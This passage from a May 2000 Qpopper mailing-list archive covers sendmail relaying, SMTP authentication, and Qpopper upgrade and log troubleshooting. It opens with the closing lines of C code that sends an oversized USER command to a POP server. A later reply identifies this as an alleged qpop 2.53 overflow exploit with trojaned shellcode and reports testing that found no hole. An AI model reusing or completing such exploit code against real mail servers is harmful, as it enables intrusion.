snprintf(sendbuf, sizeof(sendbuf)-1,"USER %s\n",buff);
if (write(sfd, sendbuf, strlen(sendbuf)) < 0) {
perror("write");
quit(1);
}
close(sfd);
quit(0);
}
void quit(int x)
{
qpop_proc();
exit(x);
}
Date: Mon, 15 May 2000 08:01:27 -0600
From: Tony Kim <tonyk at canadashop dot com>
Subject: Allowing only certain people to sendmail.
I don't know if I am just getting spoofed, but someone that I know got spam
from one of my domains, but was a weird address like i788123@ , but that
account did not exist... I am wondering if I am just being spoofed, or
what... My pop server and my smtp server are different, so I really think
that people are just spoofing.... however I keep getting emails with the
header "Postmaster notify: Cannot send message within 5 days" Is is
something to do with ESMTP ??... I see that a lot...
Is it needed to have the smtp server on the pop server ??..
I hope you can understand this email :)
Tony K.
Date: Mon, 15 May 2000 10:18:50 -0400 (EDT)
From: Christopher Cramer <cec at ee.duke dot edu>
Subject: Re: Allowing only certain people to sendmail.
Tony,
Believe it or not, that did make sense :-)
I don't know how feasible this is for your domains, but when we were
having problems with this, I ended up turing off relaying in
sendmail. The problem is that spammers find sites that have on relaying,
by which I mean: your sendmail will handle mail from a machine outside
a group you specify (usually your domain) even if it is going to a site
outside of your domain, i.e. a third party.
In general, relaying probably isn't necessary as most uses of sendmail
require either one of your machines sending to the outside world, or the
outside world sending to you. I believe that by default, sendmail 8.9.x
turns off relaying (although if you use an old sendmail.cf file, you may
still be relaying).
As to the pop server being different than the SMTP server, I guess that
depends on whether the NFS file locks are working under QPopper or not.
Now it's my turn to wonder if the above made sense. I hope it helps.
-Chris
p.s. it looks like you just fixed this this morning?
----------------------------------------------------------------------
Dr. Christopher E. Cramer
Associate in Research
Duke University, Department of Electrical and Computer Engineering
114 Hudson Hall, Box 90291, Durham, NC 27708-0291
PH: 919-660-5248 FAX: 919-660-5293 email: cec at ee.duke dot edu
On Mon, 15 May 2000, Tony Kim wrote:
> I don't know if I am just getting spoofed, but someone that I know got spam
> from one of my domains, but was a weird address like i788123@ , but that
> account did not exist... I am wondering if I am just being spoofed, or
> what... My pop server and my smtp server are different, so I really think
> that people are just spoofing.... however I keep getting emails with the
> header "Postmaster notify: Cannot send message within 5 days" Is is
> something to do with ESMTP ??... I see that a lot...
> Is it needed to have the smtp server on the pop server ??..
>
> I hope you can understand this email :)
>
> Tony K.
>
From: Frank Pineau <frank at pineaus dot com>
Subject: Re: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 10:33:30 -0400
On Mon, 15 May 2000 10:18:50 -0400 (EDT), a data storm erupted from Christopher
Cramer <cec at ee.duke dot edu>:
>In general, relaying probably isn't necessary as most uses of sendmail
>require either one of your machines sending to the outside world, or the
>outside world sending to you.
As I understand it, relaying refers to any sender besides localhost, rather than
differentiating between a "public" and "private" network. This has been a
perennial problem for mail hosts: How to allow access for authorized users and
deny it to the spammers, hence things like POP-before-SMTP and popauth.
FP
--
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
Frank Pineau ------------>
frank at pineaus.IHATESPAM dot com
http://www.pineaus.com
Eight out of every five people are math illiterate.
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
PGP Public Key:
http://www.pineaus.com/frankpineau.asc
No mail from web-based mail systems such as Hotmail
or Yahoo will be accepted.
From: "Martin Bene" <mb at sime dot com>
Subject: AW: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 17:00:21 +0200
Hi Frank,
> As I understand it, relaying refers to any sender besides
> localhost, rather than
> differentiating between a "public" and "private" network. This has been a
> perennial problem for mail hosts: How to allow access for
> authorized users and
> deny it to the spammers, hence things like POP-before-SMTP and popauth.
Currently I think the best aproach to the problem is:
1) if there are address ranges used solely by userss you do want to use your
server, put these addresses / address ranges in access_db with entry RELAY.
This should take care of most cases and isn't costly in terms of CPU /
resources.
2) If you need your server to relay for roaming users connecting from
unknown addresses:
Take into consideration that this case adds aditional security concerns with
transmission of cleartext passwords. So, preferred solutions should use
encryption.
a) install sslwrap or stunnel for pop / imap access. (small warning: this
nukes pop-before smtp as the connections are logged by popper as comming
from localhost)
b) install latest sendmail 8.11 (currently beta1) which supports SSL and
SMTP authentication, allow relay for authenticated smtp sessions.
3) pop-before smtp should only be used as a last-ditch measure for clients
running clients incapable of using ssl and/or smtp authentication.
Hint: Outlook 2000, Outlook express, Netscape 4.72 Messenger, Eudora 4.3 all
work with the above setup without resorting to pop-before smtp. An aditional
nuisance with pop-before smtp ist that it's not the sequence most
mailclients use - the standard case seems to be to first try to send pending
mail via smtp and THEN check for incoming mail, which results in error
messages for the user and calls to customer support for you.
this setup gives your customers secure access to your mail server and gives
you tight control over what hosts may relay via your system.
Bye, Martin
"you have moved your mouse, please reboot to make this change take effect"
--------------------------------------------------
Martin Bene vox: +43-316-813824
simon media fax: +43-316-813824-6
Andreas-Hofer-Platz 9 e-mail: mb at sime dot com
8010 Graz, Austria
--------------------------------------------------
finger mb at mail.sime dot com for PGP public key
Date: Mon, 15 May 2000 11:11:31 -0400 (EDT)
From: Christopher Cramer <cec at ee.duke dot edu>
Subject: Re: Allowing only certain people to sendmail.
Okay, sort-of. Technically, relaying is receiving from outside of your
machine and sending outside of your machine. However, the CR directive in
sendmail.cf allows you to specify domains for which you allow relaying.
for example, I have in my sendmail.cf file:
CRduke.edu
which means that even though my machine is mail.ee.duke.edu and my domain
is ee.duke.edu, I'll relay anything from a .duke.edu machine. Since all
of my machines have DNS MX records pointing to the mail server, it is
functionally the same as I originally described.
-Chris
----------------------------------------------------------------------
Dr. Christopher E. Cramer
Associate in Research
Duke University, Department of Electrical and Computer Engineering
114 Hudson Hall, Box 90291, Durham, NC 27708-0291
PH: 919-660-5248 FAX: 919-660-5293 email: cec at ee.duke dot edu
On Mon, 15 May 2000, Frank Pineau wrote:
> On Mon, 15 May 2000 10:18:50 -0400 (EDT), a data storm erupted from Christopher
> Cramer <cec at ee.duke dot edu>:
>
> >In general, relaying probably isn't necessary as most uses of sendmail
> >require either one of your machines sending to the outside world, or the
> >outside world sending to you.
>
> As I understand it, relaying refers to any sender besides localhost, rather than
> differentiating between a "public" and "private" network. This has been a
> perennial problem for mail hosts: How to allow access for authorized users and
> deny it to the spammers, hence things like POP-before-SMTP and popauth.
>
> FP
>
>
> --
> <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
> Frank Pineau ------------>
>
> frank at pineaus.IHATESPAM dot com
> http://www.pineaus.com
>
> Eight out of every five people are math illiterate.
> <*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
> PGP Public Key:
> http://www.pineaus.com/frankpineau.asc
>
> No mail from web-based mail systems such as Hotmail
> or Yahoo will be accepted.
>
Date: Mon, 15 May 2000 11:29:49 -0400
From: Forrest Aldrich <forrie at forrie dot com>
Subject: Re: Allowing only certain people to sendmail.
With this issue pressing again, I would like to direct people to:
http://mail.cc.umanitoba.ca/drac/index.html
For which I have provided patches for, to qpopper. I'm told these patches
will be included in the next release (??).
We've been using this without issue for many months now.
Forrest
Date: Mon, 15 May 2000 09:37:27 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: Qpopper 3.0.1 (final) available (X-UIDL format)
At 12:04 PM +0100 5/15/00, Andrew J Cole wrote:
> Just upgraded from 2.53 to 3.0.1 (Sun OS 4.1.4) and noticed that the
> X-UIDL: headers are now being generated incorrectly (probably from a
> uninitialised structure).
>
> Andrew
The UIDs are fine, they are not mangled. They may look strange, but
that is OK. They are in conformance with RFC 1939.
Date: Tue, 16 May 2000 05:15:20 +1200 (NZST)
From: Alan Brown <alan at manawatu.gen dot nz>
Subject: Re: Allowing only certain people to sendmail.
On Mon, 15 May 2000, Frank Pineau wrote:
> As I understand it, relaying refers to any sender besides localhost, rather than
> differentiating between a "public" and "private" network. This has been a
> perennial problem for mail hosts: How to allow access for authorized users and
> deny it to the spammers, hence things like POP-before-SMTP and popauth.
and more recently, Authenticated SMTP - this is natively handled in
sendmail 8.10 and is one of the 100 good reasons to update from erlier
versions.
AB
Date: Tue, 16 May 2000 05:26:38 +1200 (NZST)
From: Alan Brown <alan at manawatu.gen dot nz>
Subject: Re: AW: Allowing only certain people to sendmail.
On Mon, 15 May 2000, Martin Bene wrote:
> An aditional
> nuisance with pop-before smtp ist that it's not the sequence most
> mailclients use - the standard case seems to be to first try to send pending
> mail via smtp and THEN check for incoming mail, which results in error
> messages for the user and calls to customer support for you.
Most clients out there try to pop3 first. MS Outlook and its kin try the
other way around. Whether there re more of these out there depends on
the number, time on the net and clue level of your users.
As far as errors go, a pop-before-smtp solution without authenticted
smtp just means educating users whose clients do try smtp first to check
mail first, or ignore the error message and try again in a few seconds.
> this setup gives your customers secure access to your mail server and gives
> you tight control over what hosts may relay via your system.
...Until spammers find a new backdoor(*). To be honest I'm surpised that
we haven't seen many taking advantage of the default "secured" Netscape
3.* server hole which allows spammers to set as many recipients as they
want per envelope, or the well-publicised MS Exchange 5.5 sp2 hole.
(*) Just because sooner or later one is likely to find a new hole
doesn't mean we should give up on security efforts. To do so would
result in mail becoming as unusable as Usenet.
AB
From: Daniel Norton <danorton at chsw dot com>
Subject: off-topic: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 14:29:10 -0400
On Tue, 16 May 2000 05:15:20 +1200 (NZST), Alan Brown
<alan at manawatu.gen dot nz> wrote:
>and more recently, Authenticated SMTP - this is natively handled in
>sendmail 8.10 and is one of the 100 good reasons to update from erlier
>versions.
Can you tell me which popular E-mail software (& versions) supports the
authentication provided by sendmail 8.10 ?
Thanks.
--
Daniel Norton
From: Frank Pineau <frank at pineaus dot com>
Subject: Re: off-topic: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 14:43:30 -0400
On Mon, 15 May 2000 14:29:10 -0400, a data storm erupted from Daniel Norton
<danorton at chsw dot com>:
>On Tue, 16 May 2000 05:15:20 +1200 (NZST), Alan Brown
><alan at manawatu.gen dot nz> wrote:
>>and more recently, Authenticated SMTP - this is natively handled in
>>sendmail 8.10 and is one of the 100 good reasons to update from erlier
>>versions.
>
>Can you tell me which popular E-mail software (& versions) supports the
>authentication provided by sendmail 8.10 ?
>
>Thanks.
IIRC, there's a list at www.sendmail.org, but Netscape and Eudora are two of
them. There are about a dozen (not mine, unfortunately)
FP
--
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
Frank Pineau ------------>
frank at pineaus.IHATESPAM dot com
http://www.pineaus.com
Eight out of every five people are math illiterate.
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
PGP Public Key:
http://www.pineaus.com/frankpineau.asc
No mail from web-based mail systems such as Hotmail
or Yahoo will be accepted.
Date: Mon, 15 May 2000 13:48:26 -0500
From: "Julian Y. Koh" <kohster at mac dot com>
Subject: Re: off-topic: Allowing only certain people to sendmail.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
At 14:29 -0400 5/15/2000, Daniel Norton wrote:
>Can you tell me which popular E-mail software (& versions) supports the
>authentication provided by sendmail 8.10 ?
Eudora 4.3 does. :):)
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2
Comment: <http://charlotte.at.northwestern.edu/julian/pgppubkey.html>
iQA/AwUBOSBGdQ5UB5zJHgFjEQIk2gCggn1yFKq5yF9R2wXQKpR6nulzbIoAoNIP
3P5W4NIh5m1tbNLuAZxgqczD
=3BYO
-----END PGP SIGNATURE-----
--
Julian Y. Koh
kohster at mac dot com
PGP Public Key:<http://charlotte.at.northwestern.edu/julian/pgppubkey.html>
Subject: Re: off-topic: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 14:59:28 -0400
From: Ken Hornstein <kenh at cmf.nrl.navy dot mil>
>At 14:29 -0400 5/15/2000, Daniel Norton wrote:
>>Can you tell me which popular E-mail software (& versions) supports the
>>authentication provided by sendmail 8.10 ?
>
>Eudora 4.3 does. :):)
Only CRAM-MD5, unfortunately.
--Ken
From: Daniel Norton <danorton at chsw dot com>
Subject: Re: off-topic: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 15:23:03 -0400
On Mon, 15 May 2000 14:43:30 -0400, Frank Pineau <frank at pineaus dot com>
wrote:
>IIRC, there's a list at www.sendmail.org, but Netscape and Eudora are two of
>them.
More specifically:
http://www.sendmail.org/~ca/email/mel/SASL_ClientRef.html
Thanks.
--
Daniel Norton
From: Frank Pineau <frank at pineaus dot com>
Subject: Re: off-topic: Allowing only certain people to sendmail.
Date: Mon, 15 May 2000 15:33:28 -0400
http://www.sendmail.org/~ca/email/mel/SASL_ClientRef.html
On Mon, 15 May 2000 14:57:13 -0400, a data storm erupted from Daniel Norton
<danorton at chsw dot com>:
>On Mon, 15 May 2000 14:43:30 -0400, Frank Pineau <frank at pineaus dot com>
>wrote:
>>IIRC, there's a list at www.sendmail.org, but Netscape and Eudora are two of
>>them.
>
>Do you have a specific URL at sendmail.org ? It's not obvious to me
>where it is (and it's not in the 8.10 release notes).
>
>
--
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
Frank Pineau ------------>
frank at pineaus.IHATESPAM dot com
http://www.pineaus.com
Eight out of every five people are math illiterate.
<*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*><*>
PGP Public Key:
http://www.pineaus.com/frankpineau.asc
No mail from web-based mail systems such as Hotmail
or Yahoo will be accepted.
Date: Mon, 15 May 2000 13:39:43 -0600
From: Tony Kim <tonyk at canadashop dot com>
Subject: Allowing only certain people to sendmail.
I am trying to install qpopper 3.0.1, but when I do, it seems like no-one
gets any new mail... however, once I change the config back to the 2.53 or
whatever the mail is in there... how do I specify where the mail is storing
and retrieving... I just wanna upgrade the qpopper...
Currently all mail is stored in /var/spool/mail and it would be cool if
I could upgrade the qpopper and still use the same file...
I did a configure --enable-servermode --enable-specialauth
--enable-log-login --enable-group-bulls --enable-bulletins=/var/spool/bulls
.. when I change the inetd.conf and do a killall -HUP inetd, I can telnet
into the box with the correct version, but it always says there is no new
mail... anyone help?
Thanks in advance.
Tony.
Date: Mon, 15 May 2000 13:53:16 -0600
From: Tony Kim <tonyk at canadashop dot com>
Subject: Whoops... qpopper3.0.1 question (subject was wrong last msg)
I am trying to install qpopper 3.0.1, but when I do, it seems like no-one
gets any new mail... however, once I change the config back to the 2.53 or
whatever the mail is in there... how do I specify where the mail is storing
and retrieving... I just wanna upgrade the qpopper...
Currently all mail is stored in /var/spool/mail and it would be cool if
I could upgrade the qpopper and still use the same file...
I did a configure --enable-servermode --enable-specialauth
--enable-log-login --enable-group-bulls --enable-bulletins=/var/spool/bulls
.. when I change the inetd.conf and do a killall -HUP inetd, I can telnet
into the box with the correct version, but it always says there is no new
mail... anyone help?
Thanks in advance.
Tony.
Date: Mon, 15 May 2000 21:16:23 -0400
From: Brad Groshok <bgroshok at odyssey.on dot ca>
Subject: popper ver 3.0.1 logfile error messages???
Running qpopper 3.0.1 in Server mode on Solaris 2.8
Is there info anywhere on the meaning of the error messages
that are put in the popper.log file.
For example I'm getting lots of the following:
-ERR POP EOF or I/O Error: 9 (Bad file number); 0 (Error 0)
[0] 9 (Bad file number); 0 (Error 0)
[-1] 131 (Connection reset by peer); 0 (Error 0)
[0] 2 (No such file or directory); 0 (Error 0)
-ERR SIGHUP or SIGPIPE flagged
-ERR Unknown authentication mechanism: twinkie
In a perfect world there wouldn't be any error messages
but I should at least understand why these are happening
and attempt to correct situation for various customers.
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
_/ Regards: Brad Groshok (bgroshok at odyssey.on dot ca) _/
_/ President Odyssey Network Inc. http://www.odyssey.on.ca _/
_/ London Ontario Canada PH:(519)660-8883 Fax:(519)660-6111 _/
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
Date: Tue, 16 May 2000 13:46:18 +1200 (NZST)
From: Alan Brown <alan at manawatu.gen dot nz>
Subject: Re: off-topic: Allowing only certain people to sendmail.
On Mon, 15 May 2000, Daniel Norton wrote:
> Can you tell me which popular E-mail software (& versions) supports the
> authentication provided by sendmail 8.10 ?
MS Outhouse (multiple versions), Eudora 4.3 for starters
Anyone know if current Pegasus cllients can do AUTH SMTP?
AB
Date: Mon, 15 May 2000 18:41:47 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: Qpopper3.0.1 and MailMan
At 5:04 PM -0500 5/14/00, Butch Kemper wrote:
> I have installed Qpopper 3.0.1 on Solaris and everything seems
> fine except when Qpopper is accessed from the web server program
> MailMan. Qpopper logs these messages each time the MailMan
> program accesses a mail box. When I use Qpopper 3.0.1 to access
> the same mailbox with Eudora or directly by telnet, there are no
> error messages.
>
> May 14 13:01:31 orion popper3[28777]: EOF from kemper at
> 207.13.78.11 (mail-in.tstar.net): [0] 2 (No such file or
> directory); 0 (Error 0)
> May 14 13:01:31 orion popper3[28777]: kemper at mail-in.tstar.net
> (207.13.78.11): -ERR POP EOF or I/O Error: 11 (Resource
> temporarily unavailable); 0 (Error 0)
>
> I am currently using Qpopper 2.53 with MailMan and I do not see
> any problems in the error log.
>
> Do anyone have any suggestions?
It seems the MailMan program is closing the connection prematurely.
It's pretty clear those are EOFs, not actual I/O errors, and thus
you can ignore the error text, since it's incorrect.
Date: Mon, 15 May 2000 18:47:47 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: Whoops... qpopper3.0.1 question (subject was wrong last
At 1:53 PM -0600 5/15/00, Tony Kim wrote:
> I am trying to install qpopper 3.0.1, but when I do, it seems like no-one
> gets any new mail... however, once I change the config back to the 2.53 or
> whatever the mail is in there... how do I specify where the mail is storing
> and retrieving... I just wanna upgrade the qpopper...
>
> Currently all mail is stored in /var/spool/mail and it would be cool if
> I could upgrade the qpopper and still use the same file...
>
> I did a configure --enable-servermode --enable-specialauth
> --enable-log-login --enable-group-bulls --enable-bulletins=/var/spool/bulls
>
> .. when I change the inetd.conf and do a killall -HUP inetd, I can telnet
> into the box with the correct version, but it always says there is no new
> mail... anyone help?
>
> Thanks in advance.
>
> Tony.
Check the definition of POP_MAILDIR in the config.h file and see if
it is correct. It's possible the configure script got confused.
If so, change both POP_MAILDIR and POP_DROP_DIR to be correct.
Date: Mon, 15 May 2000 18:54:24 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: popper ver 3.0.1 logfile error messages???
At 9:16 PM -0400 5/15/00, Brad Groshok wrote:
> Running qpopper 3.0.1 in Server mode on Solaris 2.8
>
> Is there info anywhere on the meaning of the error messages
> that are put in the popper.log file.
>
> For example I'm getting lots of the following:
> -ERR POP EOF or I/O Error: 9 (Bad file number); 0 (Error 0)
> [0] 9 (Bad file number); 0 (Error 0)
> [-1] 131 (Connection reset by peer); 0 (Error 0)
> [0] 2 (No such file or directory); 0 (Error 0)
The "POP EOF or I/O Error" almost always means an EOF, that is, the
client closed the connection. Generally this is because the client
software has a too-short timeout, or the user is on a dial-up and
gets disconnected. At the point this error is issued, Qpopper no
longer knows if it was an EOF or an actual I/O error, so it reports
what the error would be if it was an I/O error. Since it is almost
always an EOF, this results in a confusing log entry with an
essentially random error number and string. But the important part
is the "EOF or" beforehand.
> -ERR SIGHUP or SIGPIPE flagged
This is most likely the same thing.
> -ERR Unknown authentication mechanism: twinkie
A MS client tried to use a non-standard, unsupported authentication mechanism.
>
> In a perfect world there wouldn't be any error messages
> but I should at least understand why these are happening
> and attempt to correct situation for various customers.
If you notice some users frequently getting EOF errors, suggest
they increase the timeout value in their client software, or use
better client software (they can always try Eudora).
Date: Mon, 15 May 2000 19:10:07 -0700
From: Qpopper Support <qpopper at qualcomm dot com>
Subject: Re: qpop 2.53
At 4:56 PM +0400 5/15/00, Alexander Kuznetsov wrote:
> this has been found in the wild, however there seems to be a trojan in the
> shellcode. Popper 2.5* has been
> thought to be safe. I would not reccomend running this on your own machine
> unless you crack the shellcode
> and see what it does.
Has anyone run this and found a buffer overflow in Qpopepr 2.53 or
3.01? I just ran my own buffer-overflow test utility against both
versions and it found nothing. It tests every parameter of every
command for a possible buffer overflow. From a quick glance at the
code in the message, it seems to try and overflow the USER command.
I can't find a problem here (or in any command) in either 2.53 or
3.0.1.
However, I do recommend upgrading from 2.53 to 3.0.1, as 3.0.1
fixes a number of problems.
From: "James Nelson" <james at digit.bloomnet dot com>
Subject: Re: Not running
Date: Mon, 15 May 2000 23:17:14 -0500
Finally someone else who reports the same problem!!
3.0B34 works fine, but not 3.0 or 3.01.
Ok-- so now maybe someone will look at this now that it has been
reproduced.
--James
----- Original Message -----
From: <Metagents at aol dot com>
To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
Sent: Sunday, May 14, 2000 7:09 PM
Subject: Not running
| Hi All
| I have installed qpopper 3.0 on Red Hat Linux 6.2 (new VA Linux
machine), and
| followed the directions exactly. I edited inetd.conf adding the line
"pop3
| stream tcp nowait root /usr/local/lib/popper qpopper -s" and get the
| following line in my messages log:
| "May 14 13:28:16 va inetd[6220]: execv /usr/local/lib/popper:
Permission
| denied"
| When I try to telnet to the pop3 I get:
| "Trying my.ip.address.102...
| Connected to my.site.com.
| Escape character is '^]'.
| Connection closed by foreign host."
|
| I tried the line from my old machine running qpopper which read
| "pop-3 stream tcp nowait root /usr/sbin/tcpd
| /usr/local/lib/popper/popper"
| It worked on my old box running Red Hat 6.0, but doesn't work here.
| Can someone help?
|
| Thanks
| MM
|
Date: Tue, 16 May 2000 08:58:25 -0400 (EDT)
From: Admin Mailing Lists <mlist at intergrafix dot net>
Subject: Re: popper ver 3.0.1 logfile error messages???
> >
> > For example I'm getting lots of the following:
> > -ERR POP EOF or I/O Error: 9 (Bad file number); 0 (Error 0)
> > [0] 9 (Bad file number); 0 (Error 0)
> > [-1] 131 (Connection reset by peer); 0 (Error 0)
> > [0] 2 (No such file or directory); 0 (Error 0)
>
> The "POP EOF or I/O Error" almost always means an EOF, that is, the
> client closed the connection. Generally this is because the client
> software has a too-short timeout, or the user is on a dial-up and
on a connection reset by peer, yes, i understand getting that error. it's
usually the result of a bad read() on a socket. read()ing after the socket
has gone away. but bad file number? in my socket programming that's not a
normal error, to me it means that we're trying to do socket operation on a
descriptor that's not meant to be used that way, or isn't open to be used.
This shouldn't be a common error. but you are the authors, I really
haven't delved in your source code too much.
>
> > -ERR SIGHUP or SIGPIPE flagged
>
> This is most likely the same thing.
>
to the original poster, SIGPIPEs are commonly generated when you try to
write() to a socket that isn't there anymore. kinda like the read()
explanation above, just with write(). They usually can be ignored.
qpopper people, is there any reason you guys dont use select() to check
for read/writeability?
i also was wondering what you found the advantages were of using multiple
spawned processes over 1 daemon process with select() handling?
-Tony
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
Anthony J. Biacco Network Administrator/Engineer
admin at intergrafix dot net Intergrafix Internet Services
"Dream as if you'll live forever, live as if you'll die today"
http://cygnus.ncohafmuta.com http://www.intergrafix.net
.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-._.-.
From: fatemeh at dpi.net dot ir
Date: Tue, 16 May 2000 17:47:53 +0330
Subject: Question
Dear All,
Has anyone any experience about how many users (mailbox) does qpopper
3.0 support?
Thanks in advance for any response
Regards
F.Taj
Date: Tue, 16 May 2000 11:25:12 -0400
From: "Gregory Hall" <Ghall at HAI dot COM>
Subject: qpopper3.0 install on Solaris 7
I am trying to install qpopper3.0 on a Solaris 7 platform. I am getting =
an error from the get go when I issue the command ./configure. The error =
reads as such.
creating cache ./config.cache
checking whether make sets ${MAKE}... yes
checking for gcc... no
checking for cc... no
configure:error: no acceptable cc found in $PATH
My guess is I don't have cc on my machine. I did do a man on cc and it =
tells me that /usr/ucb/cc is the interface to the BSD Compatibility =
Package C compiler. It is a script that looks for the link /usr/ccs/bin/uc=
bcc to the C compiler. /usr/ccs/bin/ucbcc is available only w/ the SPROcc =
package, whose default location is /opt/SUNWspro. I did check to see if =
SUNWspro was located under /opt and I did not see it. If this is the case =
and I don't have the necessary C compiler needed to configure qpopper can =
someone give me some help on how I can get what I need.
Thanks in advance
Greg
Greg Hall
Unix Systems Administrator
Houston Associates, Inc.
703 284-8777
Subject: Re: Question
Date: Tue, 16 May 2000 09:58:16 -0400
From: Ken Hornstein <kenh at cmf.nrl.navy dot mil>
>Has anyone any experience about how many users (mailbox) does qpopper
>3.0 support?
All of them.
--Ken
Date: Tue, 16 May 2000 13:08:46 -0400
From: Eric Hunter <ehunter at netrover dot com>
Subject: Re: qpopper3.0 install on Solaris 7
Hi Greg,
The easiest way to do this, is to go to http://www.sunfreeware.com and
download the GCC package for Solaris 7. Install that, and use GCC instead.
The Sun CC compiler is horrible, and doesn't work on most programs out there.
Eric
At 11:25 AM 5/16/00 -0400, Gregory Hall wrote:
>I am trying to install qpopper3.0 on a Solaris 7 platform. I am getting
an error from the get go when I issue the command ./configure. The error
reads as such.
>
>creating cache ./config.cache
>checking whether make sets ${MAKE}... yes
>checking for gcc... no
>checking for cc... no
>configure:error: no acceptable cc found in $PATH
>
>
>My guess is I don't have cc on my machine. I did do a man on cc and it
tells me that /usr/ucb/cc is the interface to the BSD Compatibility Package
C compiler. It is a script that looks for the link /usr/ccs/bin/ucbcc to
the C compiler. /usr/ccs/bin/ucbcc is available only w/ the SPROcc
package, whose default location is /opt/SUNWspro. I did check to see if
SUNWspro was located under /opt and I did not see it. If this is the case
and I don't have the necessary C compiler needed to configure qpopper can
someone give me some help on how I can get what I need.
>
>Thanks in advance
>
>Greg
>
>Greg Hall
>Unix Systems Administrator
>Houston Associates, Inc.
>703 284-8777
>
>
Date: Tue, 16 May 2000 13:13:07 -0400 (EDT)
From: Christopher Cramer <cec at ee.duke dot edu>
Subject: Re: qpopper3.0 install on Solaris 7
Sun took the compilers out of Solaris many years ago. You might try
either bootstrapping gcc <shudder> or downloading a pre-compiled gcc
perhaps from:
http://www.sunfreeware.com/
good luck,
Chris
----------------------------------------------------------------------
Dr. Christopher E. Cramer
Associate in Research
Duke University, Department of Electrical and Computer Engineering
114 Hudson Hall, Box 90291, Durham, NC 27708-0291
PH: 919-660-5248 FAX: 919-660-5293 email: cec at ee.duke dot edu
On Tue, 16 May 2000, Gregory Hall wrote:
> I am trying to install qpopper3.0 on a Solaris 7 platform. I am getting an error from the get go when I issue the command ./configure. The error reads as such.
>
> creating cache ./config.cache
> checking whether make sets ${MAKE}... yes
> checking for gcc... no
> checking for cc... no
> configure:error: no acceptable cc found in $PATH
>
>
> My guess is I don't have cc on my machine. I did do a man on cc and it tells me that /usr/ucb/cc is the interface to the BSD Compatibility Package C compiler. It is a script that looks for the link /usr/ccs/bin/ucbcc to the C compiler. /usr/ccs/bi
cbcc is available only w/ the SPROcc package, whose default location is /opt/SUNWspro. I did check to see if SUNWspro was located under /opt and I did not see it. If this is the case and I don't have the necessary C compiler needed to configure qpoppe
r can someone give me some help on how I can get what I need.
>
> Thanks in advance
>
> Greg
>
> Greg Hall
> Unix Systems Administrator
> Houston Associates, Inc.
> 703 284-8777
>
Date: Tue, 16 May 2000 10:33:25 -0700
From: Joel Laing <joel at scripps dot edu>
Subject: Re: Not running
Errr... this may be too simple, but what are the permissions and
ownership of the executable?
-Joel
James Nelson wrote:
>
> Finally someone else who reports the same problem!!
>
> 3.0B34 works fine, but not 3.0 or 3.01.
>
> Ok-- so now maybe someone will look at this now that it has been
> reproduced.
>
> --James
>
> ----- Original Message -----
> From: <Metagents at aol dot com>
> To: "Subscribers of Qpopper" <qpopper at lists.pensive dot org>
> Sent: Sunday, May 14, 2000 7:09 PM
> Subject: Not running
>
> | Hi All
> | I have installed qpopper 3.0 on Red Hat Linux 6.2 (new VA Linux
> machine), and
> | followed the directions exactly. I edited inetd.conf adding the line
> "pop3
> | stream tcp nowait root /usr/local/lib/popper qpopper -s" and get the
> | following line in my messages log:
> | "May 14 13:28:16 va inetd[6220]: execv /usr/local/lib/popper:
> Permission
> | denied"
> | When I try to telnet to the pop3 I get:
> | "Trying my.ip.address.102...
> | Connected to my.site.com.
> | Escape character is '^]'.
> | Connection closed by foreign host."
> |
> | I tried the line from my old machine running qpopper which read
> | "pop-3 stream tcp nowait root /usr/sbin/tcpd
> | /usr/local/lib/popper/popper"
> | It worked on my old box running Red Hat 6.0, but doesn't work here.
> | Can someone help?
> |
> | Thanks
> | MM
> |